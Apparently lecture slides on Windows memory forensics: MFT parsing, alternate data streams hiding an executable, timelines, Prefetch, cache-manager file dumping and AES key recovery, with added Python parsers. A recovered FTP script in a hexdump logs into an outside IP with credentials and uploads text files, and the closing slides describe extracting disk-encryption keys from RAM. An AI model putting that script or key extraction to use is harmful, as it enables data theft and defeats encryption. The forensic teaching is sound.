New Technology File System (NTFS) artifacts
Master File Table (MFT) records
Alternative Data Streams (ADS)
Windows Cache Manager
The OS is constantly opening, reading, writing and deleting files.
All OS actions leave traces in memory
Windows caches content for performance
Everything is a file
The MFT is the heart of the file system, stored at $Mft
The start of the MFT is recorded in the Volume Boot Record (VBR)
The VBR is itself the $Boot entry in the MFT
Array of file records
Each record is 1024 bytes (can be changed in $Boot)
The first record in the MFT is for the MFT itself
The first 16 records in the MFT are reserved for metadata files
Each record has
Resident attributes = contained within MFT entry
Non-resident = outside of the MFT entry
MFT record header:

Offset  Bytes      Description
0x0     0 – 3      Signature ("FILE" if good, otherwise "BAAD")
0x4     4 – 5      Offset to fixup array
0x6     6 – 7      Number of entries in fixup array
0x8     8 – 15     $LogFile LSN
0x10    16 – 17    Sequence value
0x12    18 – 19    Link count
0x14    20 – 21    Offset to first attribute
0x16    22 – 23    Flags (in-use and directory)
0x18    24 – 27    Used size of MFT entry
0x1C    28 – 31    Allocated size of MFT entry
0x20    32 – 39    File reference to base record
0x28    40 – 41    Next attribute ID
0x2A    42 – 1023  Attributes and fixup areas
Attribute header (common to every attribute):

Offset  Bytes    Description
0x0     0 – 3    Attribute type identifier
0x4     4 – 7    Length of attribute
0x8     8 – 8    Non-resident flag
0x9     9 – 9    Length of name
0xA     10 – 11  Offset to name
0xC     12 – 13  Flags
0xE     14 – 15  Attribute identifier

Common attribute types:

Type ID      Name
16 (0x10)    $STANDARD_INFORMATION
32 (0x20)    $ATTRIBUTE_LIST
48 (0x30)    $FILE_NAME
128 (0x80)   $DATA
Contains
Parse them
Investigation of removable media
Recover ADS
Recover scripts
Reconstruct events
Prove code executed with the Prefetch
Scans for FILE and BAAD signatures
When found... parse the attributes, find file path, output.
Supports
File size < 700 bytes = resident in $DATA, recovered directly from the MFT entry
File size > 700 bytes = non-resident, use dumpfiles
Outputs in verbose and in body mode
Body mode allows The Sleuth Kit's mactime to be used on the output
mactime creates an ASCII timeline of file activity
-D dumps all resident files (size < 700 bytes in $DATA)
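As an added illustration (not code from the slides or from Volatility's mftparser), the following Python walks a memory buffer the way the two tables above describe: it looks for FILE/BAAD signatures at record-aligned offsets, reads the header fields, iterates the attributes, and pulls the name out of $FILE_NAME and the content out of a resident $DATA under the 700-byte limit. build_record constructs a sample record so the code runs offline; the fixup array is deliberately not applied, an assumption that is fine for small resident content but not for the last two bytes of each 512-byte sector.

```python
import struct

ATTR_NAMES = {0x10: "$STANDARD_INFORMATION", 0x20: "$ATTRIBUTE_LIST",
              0x30: "$FILE_NAME", 0x80: "$DATA"}
RECORD_SIZE = 1024      # default record size; $Boot can change it
RESIDENT_LIMIT = 700    # the slides' rule of thumb for MFT-resident file content

def parse_record(rec):
    """Parse one MFT record using the header and attribute offsets tabulated above."""
    if rec[:4] not in (b"FILE", b"BAAD"):
        return None
    flags = struct.unpack_from("<H", rec, 0x16)[0]
    entry = {"signature": rec[:4].decode(), "seq": struct.unpack_from("<H", rec, 0x10)[0],
             "links": struct.unpack_from("<H", rec, 0x12)[0], "in_use": bool(flags & 1),
             "is_dir": bool(flags & 2), "name": None, "resident_data": None, "attributes": []}
    off = struct.unpack_from("<H", rec, 0x14)[0]          # offset to first attribute
    while off + 8 <= len(rec):
        atype, alen = struct.unpack_from("<II", rec, off)
        if atype == 0xFFFFFFFF or alen == 0:              # end-of-attributes marker
            break
        resident = rec[off + 8] == 0                      # non-resident flag at +8
        entry["attributes"].append((ATTR_NAMES.get(atype, hex(atype)), resident))
        if resident:          # resident header adds content length (+0x10) and offset (+0x14)
            clen, coff = struct.unpack_from("<IH", rec, off + 0x10)
            body = rec[off + coff: off + coff + clen]
            if atype == 0x30:                             # $FILE_NAME: name length at +0x40
                entry["name"] = body[0x42: 0x42 + 2 * body[0x40]].decode("utf-16-le")
            elif atype == 0x80 and clen < RESIDENT_LIMIT:
                entry["resident_data"] = body             # whole file lives inside the MFT
        off += alen
    return entry

def scan_mft(buf):
    """Mimic mftparser's scan: try every record-aligned offset for a FILE/BAAD signature."""
    return [(pos, e) for pos in range(0, len(buf) - RECORD_SIZE + 1, RECORD_SIZE)
            if (e := parse_record(buf[pos: pos + RECORD_SIZE]))]

def build_record(name, data):
    """Constructed sample record (not from the page): a $FILE_NAME plus a resident $DATA."""
    def resident_attr(atype, content):
        alen = (0x18 + len(content) + 7) & ~7             # attribute length, 8-byte aligned
        hdr = struct.pack("<IIBBHHHIHBB", atype, alen, 0, 0, 0, 0, 0, len(content), 0x18, 0, 0)
        return hdr + content.ljust(alen - 0x18, b"\0")
    fn = bytes(0x40) + bytes([len(name), 3]) + name.encode("utf-16-le")   # name at +0x42
    attrs = resident_attr(0x30, fn) + resident_attr(0x80, data) + b"\xff\xff\xff\xff"
    hdr = b"FILE" + struct.pack("<HHQHHHHIIQH", 0x30, 3, 0, 1, 1, 0x38, 1,   # header fields
                                0x38 + len(attrs), RECORD_SIZE, 0, 3)       # in slide order
    return (hdr.ljust(0x38, b"\0") + attrs).ljust(RECORD_SIZE, b"\0")
```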
MFT entry found at offset 0x10097800
Attribute: In Use & File
Record Number: 9614
Link count: 2
$STANDARD_INFORMATION
Creation Modified MFT Altered Access Date Type
------------------------------ ------------------------------ ------------------------------ ------------------------------ ----
2009-07-13 22:28:34 UTC+0000 2009-07-13 22:28:34 UTC+0000 2011-03-04 17:15:16 UTC+0000 2009-07-13 22:28:34 UTC+0000 Archive
$FILE_NAME
Creation Modified MFT Altered Access Date Name/Path
------------------------------ ------------------------------ ------------------------------ ------------------------------ ---------
2011-03-04 17:15:16 UTC+0000 2011-03-04 17:15:16 UTC+0000 2011-03-04 17:15:16 UTC+0000 2011-03-04 17:15:16 UTC+0000 PROGRA~1\COMMON~1\MICROS~1\Stationery\Bears.htm
$FILE_NAME
Creation Modified MFT Altered Access Date Name/Path
------------------------------ ------------------------------ ------------------------------ ------------------------------ ---------
2011-03-04 17:15:16 UTC+0000 2011-03-04 17:15:16 UTC+0000 2011-03-04 17:15:16 UTC+0000 2011-03-04 17:15:16 UTC+0000 Bears.htm
$DATA
0000000000: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 53 54 59 <HTML><HEAD><STY
0000000010: 4c 45 3e 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 LE>BODY.{font-fa
0000000020: 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 3b 66 6f 6e mily:.Tahoma;fon
0000000030: 74 2d 73 69 7a 65 3a 20 31 31 70 74 3b 63 6f 6c t-size:.11pt;col
0000000040: 6f 72 3a 20 34 62 33 30 30 38 3b 6d 61 72 67 69 or:.4b3008;margi
0000000050: 6e 2d 6c 65 66 74 3a 20 32 35 20 70 78 3b 6d 61 n-left:.25.px;ma
0000000060: 72 67 69 6e 2d 74 6f 70 3a 20 37 35 20 70 78 3b rgin-top:.75.px;
0000000070: 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 background-posit
0000000080: 69 6f 6e 3a 20 74 6f 70 20 6c 65 66 74 3b 62 61 ion:.top.left;ba
0000000090: 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a ckground-repeat:
00000000a0: 20 72 65 70 65 61 74 2d 78 3b 7d 3c 2f 53 54 59 .repeat-x;}</STY
00000000b0: 4c 45 3e 3c 2f 48 45 41 44 3e 20 3c 42 4f 44 59 LE></HEAD>.<BODY
00000000c0: 20 62 61 63 6b 67 72 6f 75 6e 64 3d 22 42 65 61 .background="Bea
00000000d0: 72 73 2e 6a 70 67 22 3e 3c 42 4f 44 59 20 62 67 rs.jpg"><BODY.bg
00000000e0: 63 6f 6c 6f 72 3d 22 66 66 66 66 66 66 22 3e 3c color="ffffff"><
00000000f0: 2f 42 4f 44 59 3e 20 3c 2f 48 54 4d 4c 3e 20 /BODY>.</HTML>.
Normal data streams, also unnamed data streams, appear after $DATA.
Alternative Data Streams
Not easily visible to a user... a cute way to hide data.
MFTParser will extract ADS if they exist
Directories can have ADS entries to hide files
In the example below, 613509021.exe would be hidden from the user inside "Windows\1654157019"
Streams from Sysinternals will show ADS on a live system
python vol.py -f Win7SP1x64.dmp --profile=Win7SP1x64 mftparser
Volatility Foundation Volatility Framework 2.4
[snip]
MFT entry found at offset 0x1c02400
Attribute: In Use & File
Record Number: 19053
[snip]
$FILE_NAME
Creation: 2014-02-18 18:27:29 UTC+0000
Modified: 2014-02-18 18:27:29 UTC+0000
MFT Altered: 2014-02-18 18:27:29 UTC+0000
Access: 2014-02-18 18:27:29 UTC+0000
Name/Path: Windows\1654157019
$DATA
$DATA ADS Name: 613509021.exe
$DATA ADS Name: 613509021.exe in Windows\1654157019
python vol.py -f Win7SP1x64.dmp --profile=Win7SP1x64 pslist
Volatility Foundation Volatility Framework 2.4
Name PID PPID Thds Hnds Sess Start
------------ ------ ------ ------ -------- ------ ------
[snip]
1654157019 3596 696 1 5 0 2014-02-18 18:27:29 UTC+0000
[snip]
python vol.py -f Win7SP1x64.dmp --profile=Win7SP1x64 dlllist -p 3596
Volatility Foundation Volatility Framework 2.4
************************************************************************
1654157019 pid: 3596
Command line : 1654157019:613509021.exe
Base Size LoadCount Path
---------- ---------- ---------- ----
0x00400000 0x330 0xffff C:\WINDOWS\1654157019:613509021.exe
So what showed up as the file 1654157019 was really 1654157019:613509021.exe, the executable hidden in an ADS named 613509021.exe
RecentDocs registry key
--output-file=mft.body
--output=body
[root&windows]#volatility -f Win7.bin --profile=Win7SP0x86 mftparser --output-file=mft.body --output=body
Volatility Foundation Volatility Framework 2.4
Scanning for MFT entries and building directory, this can take a while
[root&windows]#cat mft.body | head -n 10
0|[MFT FILE_NAME] $MFT (Offset: 0xa000)|0|-hs------------|0|0|16384|1299258843|1299258843|1299258843|1299258843
0|[MFT STD_INFO] $MFT (Offset: 0xa000)|0|-hs------------|0|0|16384|1299258843|1299258843|1299258843|1299258843
0|[MFT FILE_NAME] . (Offset: 0xa808)|5|-hs----------D-|0|0|0|1299258843|1299258843|1299258843|1299258843
0|[MFT STD_INFO] . (Offset: 0xa808)|5|-hs------------|0|0|0|1381860262|1381860262|1381860262|1247537274
0|[MFT FILE_NAME] bootmgr (Offset: 0xb408)|42703|---a-----------|0|0|0|1299259135|1299259135|1299259135|1299259135
0|[MFT STD_INFO] bootmgr (Offset: 0xb408)|42703|rhsa-----------|0|0|0|1299259135|1290288546|1299259135|1299259135
0|[MFT FILE_NAME] PROGRA~2\VMware\RAWDSK~1\native\C\Windows (Offset: 0x160000)|292|-----------I-D-|0|0|0|1341559419|1341559419|1341559419|1341559419
0|[MFT STD_INFO] PROGRA~2\VMware\RAWDSK~1\native\C\Windows (Offset: 0x160000)|292|-----------I---|0|0|0|1341559419|1341559419|1341559419|1341559419
0|[MFT FILE_NAME] PROGRA~2\MICROS~1\USERAC~1 (Offset: 0x160400)|293|-----------I-D-|0|0|0|1299258912|1299258912|1299258912|1299258912
0|[MFT STD_INFO] PROGRA~2\MICROS~1\USERAC~1 (Offset: 0x160400)|293|-----------I---|0|0|0|1299249186|1299249186|1299249186|1247539025
Use mactime from The Sleuth Kit to build a timeline!
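An added example, not part of the slides or of The Sleuth Kit: a small Python parser for the body lines above that groups the four timestamps of each entry into MACB columns the way mactime does. The five input lines are copied from the mft.body output above; note how the $STANDARD_INFORMATION modified time of bootmgr (2010) lands well before its $FILE_NAME times (2011).

```python
from datetime import datetime, timezone

# Sample input: five body-format lines copied from the mft.body output above
BODY_LINES = """\
0|[MFT FILE_NAME] $MFT (Offset: 0xa000)|0|-hs------------|0|0|16384|1299258843|1299258843|1299258843|1299258843
0|[MFT STD_INFO] $MFT (Offset: 0xa000)|0|-hs------------|0|0|16384|1299258843|1299258843|1299258843|1299258843
0|[MFT STD_INFO] . (Offset: 0xa808)|5|-hs------------|0|0|0|1381860262|1381860262|1381860262|1247537274
0|[MFT FILE_NAME] bootmgr (Offset: 0xb408)|42703|---a-----------|0|0|0|1299259135|1299259135|1299259135|1299259135
0|[MFT STD_INFO] bootmgr (Offset: 0xb408)|42703|rhsa-----------|0|0|0|1299259135|1290288546|1299259135|1299259135
"""

def parse_body(text):
    """Body format: MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime (epoch seconds)."""
    rows = []
    for line in text.splitlines():
        f = line.split("|")
        if len(f) != 11:               # skip blank or malformed lines
            continue
        rows.append({"name": f[1], "inode": f[2], "mode": f[3], "size": int(f[6]),
                     "a": int(f[7]), "m": int(f[8]), "c": int(f[9]), "b": int(f[10])})
    return rows

def mactime(rows):
    """Collapse the four timestamps of every row into one timeline line per
    (time, entry) pair, flagged MACB the way mactime prints them."""
    events = {}
    for r in rows:
        for key in "macb":
            events.setdefault((r[key], r["name"]), set()).add(key.upper())
    lines = []
    for (ts, name), flags in sorted(events.items()):
        macb = "".join(c if c in flags else "." for c in "MACB")
        when = datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%S")
        lines.append(f"{when} {macb} {name}")
    return lines
```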
Remember: the MRU keys in the Registry, and double-clicking a file creates a LNK file
MFTParser in verbose mode will show $I information which contains metadata on
$FILE_NAME
Creation: 2013-03-11 04:39:52 UTC+0000
Modified: 2013-03-11 04:39:52 UTC+0000
MFT Altered: 2013-03-11 04:39:52 UTC+0000
Access: 2013-03-11 04:39:52 UTC+0000
Name/Path: $Recycle.Bin\S-1-5-21-1133905431-3037184594-10822689-1000\$I2NGUYJ.docx
$DATA
0000000000: 01000000000000005842000000000000 ........XB......
0000000010: 00c3b478121ece0143003a005c005500 ...x....C.:.\.U.
0000000020: 73006500720073005c0041006e006400 s.e.r.s.\.A.n.d.
0000000030: 7200650077005c004400650073006b00 r.e.w.\.D.e.s.k.
0000000040: 74006f0070005c004d00650072006700 t.o.p.\.M.e.r.g.
0000000050: 65007200200055007000640061007400 e.r...U.p.d.a.t.
0000000060: 65002e0064006f006300780000000000 e...d.o.c.x.....
$I has a timestamp... how to parse it?
Timestamp is the 8 bytes at 0x10 to 0x18 (bytes 16 to 24) = 00c3b478121ece01
[root&windows]#python vol.py -f Win7SP1x64.vmem --profile=Win7SP1x64 volshell
>>> import volatility.addrspace as addrspace
>>> bufferas = addrspace.BufferAddressSpace(self._config, data = "\x00\xc3\xb4\x78\x12\x1e\xce\x01")
>>> itime = obj.Object("WinTimeStamp", offset = 0, vm = bufferas)
>>> itime.is_utc = True
>>> str(itime)
'2013-03-11 04:39:52 UTC+0000'
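An added example, not from the slides or from Volatility: the same conversion done without volshell, and parsing the whole $I record rather than only its timestamp. The bytes are those of the hexdump above; the layout assumed is the version-1 $I format (header value 1) of Vista through 8.1, while the Windows 10 version-2 format adds a path-length field and is rejected by the header check.

```python
import struct
from datetime import datetime, timedelta, timezone

# The $DATA content of $I2NGUYJ.docx, taken from the mftparser hexdump above
I_RECORD = bytes.fromhex(
    "01000000000000005842000000000000"
    "00c3b478121ece0143003a005c005500"
    "73006500720073005c0041006e006400"
    "7200650077005c004400650073006b00"
    "74006f0070005c004d00650072006700"
    "65007200200055007000640061007400"
    "65002e0064006f006300780000000000")

def filetime_to_datetime(raw8):
    """Windows FILETIME: little-endian count of 100 ns intervals since 1601-01-01 UTC."""
    ticks = struct.unpack("<Q", raw8)[0]
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ticks // 10)

def parse_i_file(data):
    """Version-1 $I layout (Vista/7/8): 8-byte header holding 1, 8-byte original size,
    FILETIME of the deletion at 0x10, original path as NUL-terminated UTF-16LE from 0x18."""
    header, size = struct.unpack_from("<QQ", data, 0)
    if header != 1:
        raise ValueError("unsupported $I header %d" % header)
    deleted = filetime_to_datetime(data[0x10:0x18])
    path = data[0x18:].decode("utf-16-le", errors="replace").split("\0", 1)[0]
    return {"original_size": size, "deleted": deleted, "original_path": path}
```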
Prefetch
[root&windows]#grep -i ".pf" mft.body | grep -i "exe" | cut -d\| -f2
[MFT FILE_NAME] PROGRA~1\MICROS~1\Windows\v6.0A\bin\pvk2pfx.exe (Offset: 0x71db000)
[MFT STD_INFO] PROGRA~1\MICROS~1\Windows\v6.0A\bin\pvk2pfx.exe (Offset: 0x71db000)
[MFT FILE_NAME] Windows\Prefetch\VSAENV.EXE-526F88E1.pf (Offset: 0x8e40000)
[MFT FILE_NAME] Windows\Prefetch\NDP40-KB2840628-V2-X86.EXE-76109BE9.pf (Offset: 0xf7c5400)
[MFT FILE_NAME] Windows\Prefetch\SETUP.EXE-A99FE93A.pf (Offset: 0xf7c5800)
[MFT FILE_NAME] Windows\Prefetch\NGEN.EXE-DEAF5A03.pf (Offset: 0xf7c5c00)
[MFT FILE_NAME] TsWpfWrp.exe (Offset: 0x11060000)
[MFT FILE_NAME] Windows\Prefetch\VC_IA64RUNTIME.EXE-35FD2B16.pf (Offset: 0x18b3d800)
[MFT FILE_NAME] Windows\Prefetch\UNLODCTR.EXE-2462BF52.pf (Offset: 0x18b79c00)
[MFT FILE_NAME] Windows\Prefetch\TASKHOST.EXE-437C05A8.pf (Offset: 0x18c73000)
Look for suspicious names... like MalwareAnalysis.docx.exe
Look for executables that are not common
Using Prefetch with mactime builds a timeline of execution!
Scripts are commonly < 700 bytes so the whole thing would be MFT-resident.
MFTParser in verbose mode shows the $DATA
$DATA
0x00000000: 6f 70 65 6e 20 36 36 2e 33 32 2e 31 31 39 2e 33 open.66.32.119.3
0x00000010: 38 0d 0a 6a 61 63 6b 0d 0a 32 61 77 65 73 30 6d 8..jack..2awes0m
0x00000020: 65 0d 0a 6c 63 64 20 63 3a 5c 57 49 4e 44 4f 57 e..lcd.c:\WINDOW
0x00000030: 53 5c 53 79 73 74 65 6d 33 32 5c 73 79 73 74 65 S\System32\syste
0x00000040: 6d 73 0d 0a 63 64 20 20 2f 68 6f 6d 65 2f 6a 61 ms..cd../home/ja
0x00000050: 63 6b 0d 0a 62 69 6e 61 72 79 0d 0a 6d 70 75 74 ck..binary..mput
0x00000060: 20 22 2a 2e 74 78 74 22 0d 0a 64 69 73 63 6f 6e ."*.txt"..discon
0x00000070: 6e 65 63 74 0d 0a 62 79 65 0d 0a nect..bye..
MFT timestamps can be manipulated
Programs exist to timestomp them; since $FILE_NAME timestamps are not reachable through the normal file-time APIs, a $STANDARD_INFORMATION set that predates its $FILE_NAME set is worth a second look
Subsystem that provides caching support for file system drivers
Frequently accessed data is kept in memory to avoid disk reads
Utilizes the memory manager for its tasks
Maps views of files with memory manager section objects (memory-mapped files)
Caches data within Virtual Address Control Blocks (VACBs), each a 256KB view of data
_FILE_OBJECT from the executive
Found by pool tag scanning, walking process handle tables, VAD nodes . . .
>>> dt("_FILE_OBJECT")
'_FILE_OBJECT' (128 bytes)
0x0 : Type ['short']
0x2 : Size ['short']
0x4 : DeviceObject ['pointer', ['_DEVICE_OBJECT']]
0x8 : Vpb ['pointer', ['_VPB']]
0xc : FsContext ['pointer', ['void']]
0x10 : FsContext2 ['pointer', ['void']]
0x14 : SectionObjectPointer ['pointer', ['_SECTION_OBJECT_POINTERS']]
0x18 : PrivateCacheMap ['pointer', ['void']]
0x1c : FinalStatus ['long']
0x20 : RelatedFileObject ['pointer', ['_FILE_OBJECT']]
0x24 : LockOperation ['unsigned char']
0x25 : DeletePending ['unsigned char']
0x26 : ReadAccess ['unsigned char']
0x27 : WriteAccess ['unsigned char']
0x28 : DeleteAccess ['unsigned char']
0x29 : SharedRead ['unsigned char']
0x2a : SharedWrite ['unsigned char']
0x2b : SharedDelete ['unsigned char']
0x2c : Flags ['unsigned long']
0x30 : FileName ['_UNICODE_STRING']
0x38 : CurrentByteOffset ['_LARGE_INTEGER']
0x40 : Waiters ['unsigned long']
0x44 : Busy ['unsigned long']
0x48 : LastLock ['pointer', ['void']]
0x4c : Lock ['_KEVENT']
0x5c : Event ['_KEVENT']
0x6c : CompletionContext ['pointer', ['_IO_COMPLETION_CONTEXT']]
0x70 : IrpListLock ['unsigned long']
0x74 : IrpList ['_LIST_ENTRY']
0x7c : FileObjectExtension ['pointer', ['void']]
The memory manager and cache manager use this to store file mapping and cache information for a file stream
>>> dt("_SECTION_OBJECT_POINTERS")
'_SECTION_OBJECT_POINTERS' (12 bytes)
0x0 : DataSectionObject ['pointer', ['void']]
0x4 : SharedCacheMap ['pointer', ['void']]
0x8 : ImageSectionObject ['pointer', ['void']]
DataSectionObject = Data
ImageSectionObject = Executable
Both point to _CONTROL_AREA which goes to _SUBSECTION used by memory manager
SharedCacheMap in _SECTION_OBJECT_POINTERS points to _SHARED_CACHE_MAP
Scans for _FILE_OBJECTs via process handle tables and VAD trees
[root&windows]#mkdir dumpedFiles
/bin/mkdir: created directory `dumpedFiles'
[root&windows]#volatility -f Win7.bin --profile=Win7SP0x86 dumpfiles -D dumpedFiles/
Volatility Foundation Volatility Framework 2.4
DataSectionObject 0x85908148 4 \Device\HarddiskVolume1\Windows\System32\LogFiles\WMI\RtBackup\EtwRTDiagLog.etl
SharedCacheMap 0x85908148 4 \Device\HarddiskVolume1\Windows\System32\LogFiles\WMI\RtBackup\EtwRTDiagLog.etl
DataSectionObject 0x851df248 4 \Device\clfsKtmLog
[snip]
Scans for file objects using pool tag scanning
[root&windows]#volatility -f Win7.bin --profile=Win7SP0x86 filescan | grep -i mft
0x000000003ef23558 3 0 RW-rwd \Device\HarddiskVolume1\$MftMirr
0x000000003ef25d28 13 0 RW-rwd \Device\HarddiskVolume1\$Mft
0x000000003efbaa68 17 0 RW-rwd \Device\HarddiskVolume1\$Mft
[root&windows]#volatility -f Win7.bin --profile=Win7SP0x86 dumpfiles -D dumpedFiles/ -n -Q 0x000000003ef25d28
Volatility Foundation Volatility Framework 2.4
DataSectionObject 0x3ef25d28 None \Device\HarddiskVolume1\$Mft
SharedCacheMap 0x3ef25d28 None \Device\HarddiskVolume1\$Mft
Keys are in RAM while encryption is occurring..
aeskeyfind Locates scheduled 128-bit and 256-bit AES keys in MEMORY-IMAGE.
[root&windows]#/opt/aeskeyfind/aeskeyfind Win7.bin
fece4febd7fd0b7b4bebda3239c28a81
5dcfc8255ed8bb69cdd2ea16c292f638
53228d50da3abbb9dc8fb6cd6aed0242
Keyfind progress: 100%
[root&windows]#/opt/aeskeyfind/aeskeyfind stuxnet.vmem
000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f
Keyfind progress: 100%
Several tools to extract keys from memory
Interrogate
Memory scary!
Master key is in memory
Cached passwords are accessible
Commercial solutions for breaking disk encryption exist (Passware, Elcomsoft), but you can do the same with open source utilities